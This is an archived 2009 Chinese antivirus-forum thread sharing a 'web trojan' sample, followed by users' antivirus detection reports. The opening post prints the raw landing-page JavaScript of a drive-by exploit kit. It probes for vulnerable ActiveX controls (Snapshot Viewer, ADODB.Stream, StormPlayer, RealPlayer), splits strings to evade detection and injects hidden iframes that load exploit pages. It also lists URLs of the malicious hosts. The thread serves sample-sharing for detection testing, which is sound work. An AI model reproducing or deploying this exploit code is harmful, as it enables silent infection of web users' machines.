查看: 2526|回复: 15
收起左侧

[病毒样本] 排名第一的网马

[复制链接]
dayang1717
发表于 2009-5-15 15:08:03 | 显示全部楼层 |阅读模式
http://008.kweilai.cn/root/vip08.htm

<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
<SCRIPT>
window.defaultStatus=".";
try{if(new ActiveXObject("snpvw.Snap"+"s"+"h"+"ot Viewer Control.1"))document.write('<iframe width=100 height=0 src=sina.htm></iframe>')}catch(a){}try{var e;var ado=document.createElement("object");if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)ado.setAttribute("classid","clsid:B"+"D96C556-65A3-11D0-983A-00C04FC29E36");var as=ado.createobject("Adodb.Stream","")}catch(e){};finally{if(e!="[object Error]"){document.write('<iframe width=100 height=0 src=11.htm></iframe>')}else{try{var h;var glworld=new ActiveXObject("GLIEDown.IEDown.1")}catch(h){};finally{if(h!="[object Error]"){document.write('<iframe style=display:none src="live.htm"></iframe>')}}try{var bf;var bfworld=new ActiveXObject("MPS.StormPlayer")}catch(bf){};finally{if(bf!="[object Error]"){document.write('<iframe style=display:none src="bf.htm"></iframe>')}}}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32"){var ammc="dsvb";
document.write('<Iframe style=display:none src="rp10.htm"></iframe>');}
else
document.write('<iframe style=display:none src="Real11.htm"></iframe>');
}
test();
document.write("");document.write("");document.write("");document.write("");var fjd="fdsfsd";abc="dfdae";document.write("");var fkav="BS";var fkasaccv="BS";var fkaqfccv="BS";var fkaqjfccv="BS";var bccv="BS";


http://wm.eo2q.cn/root/top.css

[ 本帖最后由 dayang1717 于 2009-5-15 15:17 编辑 ]
Sebastian
发表于 2009-5-15 15:12:52 | 显示全部楼层
D:\kafan\top.css
    [DETECTION] Is the TR/PSW.LdPinch.jm1 Trojan

[ 本帖最后由 Sebastian 于 2009-5-15 15:30 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
lingbo110120
发表于 2009-5-15 15:20:36 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
schumi小粉
发表于 2009-5-15 15:20:39 | 显示全部楼层
[2009-05-15 15:21:01] 发现Maxthon.exe试图访问恶意网址:wm.eo2q.cn/root/top.css,已被成功阻止!

[ 本帖最后由 schumi小粉 于 2009-5-15 15:23 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
kingsheet
发表于 2009-5-15 15:35:24 | 显示全部楼层
卡巴
检测到:木马程序 Trojan-Downloader.Win32.VB.kwb        URL: http://bbs.kafan.cn/attachment.p ... /#//PE_Patch//UPack
lyruyitong
发表于 2009-5-15 15:37:26 | 显示全部楼层
伞呢?过吗?
我们曾经是战士
发表于 2009-5-15 15:49:07 | 显示全部楼层
nis09秒杀
扫描和运行
will
发表于 2009-5-15 16:20:09 | 显示全部楼层

KV2009

在 top.css 中发现 TrojanDropper.Agent.wvc 病毒

主防KILL


[ 本帖最后由 will 于 2009-5-15 16:22 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
stoneinwind
发表于 2009-5-15 17:30:56 | 显示全部楼层
趋势kill
悠柚
发表于 2009-5-15 17:37:44 | 显示全部楼层
质量似乎不高
Windows Defender TrojanDropper:Win32/Microjoin.gen!C
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-12 15:21 , Processed in 0.123579 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表